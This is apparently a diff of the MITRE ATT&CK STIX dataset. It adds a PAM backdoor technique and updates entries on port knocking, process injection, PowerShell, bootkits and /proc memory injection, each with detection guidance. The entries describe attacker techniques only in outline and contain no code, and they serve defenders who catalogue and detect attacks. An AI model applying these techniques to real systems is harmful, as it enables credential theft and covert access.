+ "source_name": "PAM Backdoor",
+ "url": "https://github.com/zephrax/linux-pam-backdoor",
+ "description": "zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "PAM Creds",
+ "url": "https://x-c3ll.github.io/posts/PAM-backdoor-DNS/",
+ "description": "Fern\u00e1ndez, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved June 26, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Pluggable Authentication Modules",
+ "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)",
+ "id": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-07-13T21:23:01.370Z",
+ "created": "2020-06-26T04:01:09.648Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "root"
+ ],
+ "x_mitre_detection": "Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nLook for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
+ "x_mitre_data_sources": [
+ "Authentication logs",
+ "File monitoring"
+ ],
+ "x_mitre_contributors": [
+ "Scott Knight, @sdotknight, VMware Carbon Black",
+ "George Allen, VMware Carbon Black"
+ ],
"x_mitre_platforms": [
+ "Linux",
"macOS"
]
},
@@ -19406,28 +20141,8 @@
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1205",
- "url": "https://attack.mitre.org/techniques/T1205"
- },
- {
- "url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631",
- "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.",
- "source_name": "Hartrell cd00r 2002"
- }
- ],
- "name": "Port Knocking",
- "id": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
- "revoked": true,
- "type": "attack-pattern",
- "modified": "2020-01-22T20:28:29.694Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
- {
- "external_references": [
- {
- "source_name": "mitre-attack",
- "external_id": "T1545.001",
- "url": "https://attack.mitre.org/techniques/T1545/001"
+ "external_id": "T1205.001",
+ "url": "https://attack.mitre.org/techniques/T1205/001"
},
{
"url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631",
@@ -19441,7 +20156,7 @@
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Port Knocking",
"description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
- "id": "attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c",
+ "id": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -19457,25 +20172,23 @@
"phase_name": "command-and-control"
}
],
- "modified": "2020-01-22T20:26:58.120Z",
- "created": "2020-01-22T20:26:58.120Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "modified": "2020-07-01T18:23:25.002Z",
+ "created": "2020-07-01T18:23:25.002Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.",
"x_mitre_data_sources": [
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.",
- "x_mitre_defense_bypassed": [
- "Defensive network service scanning"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -19550,13 +20263,16 @@
],
"modified": "2020-01-24T19:46:27.750Z",
"created": "2020-01-24T19:46:27.750Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "SYSTEM"
],
- "x_mitre_contributors": [
- "Stefan Kanthak",
- "Travis Smith, Tripwire"
+ "x_mitre_permissions_required": [
+ "SYSTEM",
+ "Administrator"
],
+ "x_mitre_detection": "Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. \n\nMonitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)",
"x_mitre_data_sources": [
"File monitoring",
"API monitoring",
@@ -19564,16 +20280,13 @@
"Windows Registry",
"Process monitoring"
],
- "x_mitre_detection": "Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. \n\nMonitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)",
- "x_mitre_permissions_required": [
- "SYSTEM",
- "Administrator"
+ "x_mitre_contributors": [
+ "Stefan Kanthak",
+ "Travis Smith, Tripwire"
],
- "x_mitre_effective_permissions": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -19606,24 +20319,24 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-02-21T22:34:26.937Z",
+ "modified": "2020-06-20T22:19:58.813Z",
"created": "2020-01-14T01:27:31.344Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
"x_mitre_data_sources": [
"Process monitoring",
"API monitoring"
],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -19738,16 +20451,18 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-28T16:26:30.920Z",
+ "modified": "2020-06-24T13:51:22.360Z",
"created": "2020-03-09T13:48:55.078Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Praetorian"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
],
+ "x_mitre_remote_support": true,
+ "x_mitre_detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.",
"x_mitre_data_sources": [
- "Windows Registry",
+ "Windows event logs",
"Process monitoring",
"Process command-line parameters",
"PowerShell logs",
@@ -19755,14 +20470,12 @@
"File monitoring",
"DLL monitoring"
],
- "x_mitre_detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.",
- "x_mitre_remote_support": true,
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
+ "x_mitre_contributors": [
+ "Praetorian"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -19847,25 +20560,25 @@
],
"modified": "2020-03-24T21:31:31.082Z",
"created": "2020-01-24T15:11:02.758Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Allen DeRyke, ICE"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
],
+ "x_mitre_detection": "Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:\n\n* $PsHome\\Profile.ps1\n* $PsHome\\Microsoft.{HostProgram}_profile.ps1\n* $Home\\My Documents\\PowerShell\\Profile.ps1\n* $Home\\My Documents\\PowerShell\\Microsoft.{HostProgram}_profile.ps1\n\nMonitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.",
"x_mitre_data_sources": [
"PowerShell logs",
"File monitoring",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:\n\n* $PsHome\\Profile.ps1\n* $PsHome\\Microsoft.{HostProgram}_profile.ps1\n* $Home\\My Documents\\PowerShell\\Profile.ps1\n* $Home\\My Documents\\PowerShell\\Microsoft.{HostProgram}_profile.ps1\n\nMonitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
+ "x_mitre_contributors": [
+ "Allen DeRyke, ICE"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e",
@@ -19903,19 +20616,11 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-23T23:50:48.319Z",
+ "modified": "2020-05-19T21:22:38.174Z",
"created": "2019-11-13T14:44:49.439Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_detection": "Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.\n\nDisk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)",
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Host intrusion prevention systems",
- "File monitoring"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows"
],
"x_mitre_data_sources": [
"VBR",
@@ -19927,10 +20632,18 @@
"BIOS",
"API monitoring"
],
- "x_mitre_platforms": [
- "Linux",
- "Windows"
- ]
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Host intrusion prevention systems",
+ "File monitoring"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.\n\nDisk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)",
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--56ff457d-5e39-492b-974c-dfd2b8603ffe",
@@ -20001,23 +20714,23 @@
],
"modified": "2020-03-29T21:36:36.613Z",
"created": "2020-02-04T13:06:49.258Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.",
- "x_mitre_data_sources": [
- "File monitoring"
- ],
- "x_mitre_contributors": [
- "Itzik Kotler, SafeBreach"
- ],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ]
+ ],
+ "x_mitre_contributors": [
+ "Itzik Kotler, SafeBreach"
+ ],
+ "x_mitre_data_sources": [
+ "File monitoring"
+ ],
+ "x_mitre_detection": "Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -20048,27 +20761,20 @@
],
"modified": "2020-03-19T15:32:18.098Z",
"created": "2020-02-11T18:46:24.434Z",
- "x_mitre_platforms": [
- "Linux"
+ "x_mitre_data_sources": [
+ "Process monitoring"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/\\*/maps, where the \\* directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.",
"x_mitre_permissions_required": [
"root"
],
- "x_mitre_data_sources": [
- "Process monitoring"
+ "x_mitre_detection": "To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/\\*/maps, where the \\* directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux"
]
},
{
- "id": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591",
- "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes\u2019 stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes\u2019 memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ",
- "name": "Proc Memory",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -20091,6 +20797,13 @@
"description": "Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020."
}
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Proc Memory",
+ "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes\u2019 stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes\u2019 memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+ "id": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -20102,10 +20815,10 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T20:33:52.548Z",
+ "modified": "2020-06-20T22:25:55.331Z",
"created": "2020-01-14T01:34:10.588Z",
"x_mitre_defense_bypassed": [
- "Process whitelisting",
+ "Application control",
"Anti-virus"
],
"x_mitre_data_sources": [
@@ -20116,8 +20829,7 @@
"x_mitre_version": "1.0",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
- "Linux",
- "macOS"
+ "Linux"
]
},
{
@@ -20149,27 +20861,27 @@
],
"modified": "2020-03-26T18:05:53.130Z",
"created": "2017-05-31T21:30:48.728Z",
- "x_mitre_version": "1.2",
- "x_mitre_data_sources": [
- "API monitoring",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_system_requirements": [
+ "Administrator, SYSTEM may provide better process ownership details"
],
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM"
],
- "x_mitre_system_requirements": [
- "Administrator, SYSTEM may provide better process ownership details"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "API monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_version": "1.2"
},
{
"id": "attack-pattern--c1a452f3-6499-4c12-b7e9-a6a0a102af76",
@@ -20272,27 +20984,27 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T21:05:42.921Z",
+ "modified": "2020-06-20T22:27:21.304Z",
"created": "2020-01-14T17:19:50.978Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelg\u00e4nging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "User"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"API monitoring"
],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "User"
+ ],
+ "x_mitre_detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelg\u00e4nging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -20356,24 +21068,24 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T21:00:39.428Z",
+ "modified": "2020-06-20T22:28:08.758Z",
"created": "2020-01-14T17:21:54.470Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Anti-virus"
],
"x_mitre_data_sources": [
"Process monitoring",
"API monitoring"
],
- "x_mitre_defense_bypassed": [
- "Process whitelisting",
- "Anti-virus"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -20407,7 +21119,7 @@
"source_name": "GNU Acct"
},
{
- "url": "https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
+ "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
"description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.",
"source_name": "RHEL auditd"
},
@@ -20436,14 +21148,17 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T21:05:43.152Z",
+ "modified": "2020-06-20T22:28:45.651Z",
"created": "2017-05-31T21:30:47.843Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Anastasios Pingios",
- "Christiaan Beek, @ChristiaanBeek",
- "Ryan Becwar"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
